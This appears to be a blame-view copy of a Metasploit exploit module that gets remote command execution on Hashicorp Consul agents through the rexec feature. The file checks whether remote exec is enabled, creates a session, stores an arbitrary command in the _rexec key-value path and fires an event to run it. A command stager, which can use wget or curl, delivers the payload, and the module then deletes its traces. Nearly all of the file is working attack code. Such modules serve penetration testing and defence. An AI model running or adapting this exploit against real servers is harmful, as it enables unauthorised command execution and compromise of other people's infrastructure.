2018-08-10 21:35:28 +02:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
include Msf::Exploit::CmdStager
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => "Hashicorp Consul Remote Command Execution via Rexec",
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a feature of Hashicorp Consul named rexec.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
2018-08-11 12:39:59 +02:00
|
|
|
'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
|
|
|
|
|
'Francis Alexander <helofrancis[at]gmail.com>', # Discovery and PoC
|
2018-08-10 22:35:54 +02:00
|
|
|
'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
|
2018-08-10 21:35:28 +02:00
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ],
|
2018-08-10 22:35:54 +02:00
|
|
|
[ 'URL', 'https://www.consul.io/docs/commands/exec.html'],
|
2018-12-20 18:18:53 +01:00
|
|
|
[ 'URL', 'https://github.com/torque59/Garfield' ]
|
2018-08-10 21:35:28 +02:00
|
|
|
],
|
|
|
|
|
'Platform' => 'linux',
|
|
|
|
|
'Targets' => [ [ 'Linux', {} ] ],
|
|
|
|
|
'Payload' => {},
|
2018-12-18 15:48:58 +01:00
|
|
|
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ],
|
2018-08-10 21:35:28 +02:00
|
|
|
'Privileged' => false,
|
2018-12-18 17:03:09 +01:00
|
|
|
'DefaultTarget' => 0,
|
2020-10-02 17:38:06 +01:00
|
|
|
'DisclosureDate' => '2018-08-11'))
|
2018-08-10 21:35:28 +02:00
|
|
|
register_options(
|
|
|
|
|
[
|
2018-12-18 15:04:28 +01:00
|
|
|
OptString.new('TARGETURI', [true, 'The base path', '/']),
|
|
|
|
|
OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
|
2018-12-20 18:41:00 +01:00
|
|
|
OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]),
|
2018-12-18 16:02:39 +01:00
|
|
|
OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
|
2018-12-18 15:04:28 +01:00
|
|
|
Opt::RPORT(8500)
|
2018-08-10 21:35:28 +02:00
|
|
|
])
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
uri = target_uri.path
|
|
|
|
|
res = send_request_cgi({
|
2018-12-18 16:02:39 +01:00
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => normalize_uri(uri, "/v1/agent/self"),
|
|
|
|
|
'headers' => {
|
|
|
|
|
'X-Consul-Token' => datastore['ACL_TOKEN']
|
|
|
|
|
}
|
2018-08-10 21:35:28 +02:00
|
|
|
})
|
2018-12-18 15:36:52 +01:00
|
|
|
unless res
|
|
|
|
|
vprint_error 'Connection failed'
|
|
|
|
|
return CheckCode::Unknown
|
|
|
|
|
end
|
|
|
|
|
begin
|
|
|
|
|
agent_info = JSON.parse(res.body)
|
|
|
|
|
if agent_info["Config"]["DisableRemoteExec"] == false || agent_info["DebugConfig"]["DisableRemoteExec"] == false
|
|
|
|
|
return CheckCode::Vulnerable
|
|
|
|
|
else
|
|
|
|
|
return CheckCode::Safe
|
2018-08-10 21:35:28 +02:00
|
|
|
end
|
2018-12-18 15:36:52 +01:00
|
|
|
rescue JSON::ParserError
|
|
|
|
|
vprint_error 'Failed to parse JSON output.'
|
|
|
|
|
return CheckCode::Unknown
|
2018-08-10 21:35:28 +02:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def execute_command(cmd, opts = {})
|
|
|
|
|
uri = target_uri.path
|
|
|
|
|
|
|
|
|
|
print_status('Creating session.')
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'uri' => normalize_uri(uri, 'v1/session/create'),
|
2018-12-18 16:02:39 +01:00
|
|
|
'headers' => {
|
|
|
|
|
'X-Consul-Token' => datastore['ACL_TOKEN']
|
|
|
|
|
},
|
2018-08-10 21:35:28 +02:00
|
|
|
'ctype' => 'application/json',
|
2018-12-18 15:31:30 +01:00
|
|
|
'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json
|
2018-08-10 21:35:28 +02:00
|
|
|
})
|
2018-12-18 16:05:50 +01:00
|
|
|
|
2018-08-10 21:35:28 +02:00
|
|
|
if res and res.code == 200
|
|
|
|
|
begin
|
|
|
|
|
sess = JSON.parse(res.body)
|
|
|
|
|
print_status("Got rexec session ID #{sess['ID']}")
|
|
|
|
|
rescue JSON::ParseError
|
|
|
|
|
fail_with(Failure::Unknown, 'Failed to parse JSON output.')
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
print_status("Setting command for rexec session #{sess['ID']}")
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),
|
2018-12-18 16:02:39 +01:00
|
|
|
'headers' => {
|
|
|
|
|
'X-Consul-Token' => datastore['ACL_TOKEN']
|
|
|
|
|
},
|
2018-08-10 21:35:28 +02:00
|
|
|
'ctype' => 'application/json',
|
2018-12-18 15:31:30 +01:00
|
|
|
'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json
|
2018-08-10 21:35:28 +02:00
|
|
|
})
|
|
|
|
|
if res and not res.code == 200 or res.body == 'false'
|
|
|
|
|
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
print_status("Triggering execution on rexec session #{sess['ID']}")
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),
|
2018-12-18 16:02:39 +01:00
|
|
|
'headers' => {
|
|
|
|
|
'X-Consul-Token' => datastore['ACL_TOKEN']
|
|
|
|
|
},
|
2018-08-10 21:35:28 +02:00
|
|
|
'ctype' => 'application/json',
|
2018-12-18 15:31:30 +01:00
|
|
|
'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json
|
2018-08-10 21:35:28 +02:00
|
|
|
})
|
|
|
|
|
if res and not res.code == 200
|
|
|
|
|
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
|
|
|
|
|
end
|
|
|
|
|
|
2018-12-20 18:41:00 +01:00
|
|
|
begin
|
|
|
|
|
Timeout.timeout(datastore['TIMEOUT']) do
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
|
|
|
|
|
'headers' => {
|
|
|
|
|
'X-Consul-Token' => datastore['ACL_TOKEN']
|
|
|
|
|
}
|
|
|
|
|
})
|
|
|
|
|
begin
|
|
|
|
|
data = JSON.parse(res.body)
|
|
|
|
|
break if data.include? 'out'
|
|
|
|
|
rescue JSON::ParseError
|
|
|
|
|
fail_with(Failure::Unknown, 'Failed to parse JSON output.')
|
2018-08-10 21:35:28 +02:00
|
|
|
end
|
2018-12-20 18:41:00 +01:00
|
|
|
sleep 2
|
2018-08-10 21:35:28 +02:00
|
|
|
end
|
2018-12-20 18:41:00 +01:00
|
|
|
rescue Timeout::Error
|
|
|
|
|
# we catch this error so cleanup still happen afterwards
|
|
|
|
|
print_status("Timeout hit, error with payload ?")
|
2018-08-10 21:35:28 +02:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
print_status("Cleaning up rexec session #{sess['ID']}")
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),
|
2018-12-18 16:02:39 +01:00
|
|
|
'headers' => {
|
|
|
|
|
'X-Consul-Token' => datastore['ACL_TOKEN']
|
|
|
|
|
}
|
2018-08-10 21:35:28 +02:00
|
|
|
})
|
|
|
|
|
|
|
|
|
|
if res and not res.code == 200 or res.body == 'false'
|
|
|
|
|
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'method' => 'DELETE',
|
|
|
|
|
'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),
|
2018-12-18 16:02:39 +01:00
|
|
|
'headers' => {
|
|
|
|
|
'X-Consul-Token' => datastore['ACL_TOKEN']
|
|
|
|
|
}
|
2018-08-10 21:35:28 +02:00
|
|
|
})
|
|
|
|
|
|
|
|
|
|
if res and not res.code == 200 or res.body == 'false'
|
|
|
|
|
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
execute_cmdstager()
|
|
|
|
|
end
|
|
|
|
|
end
|
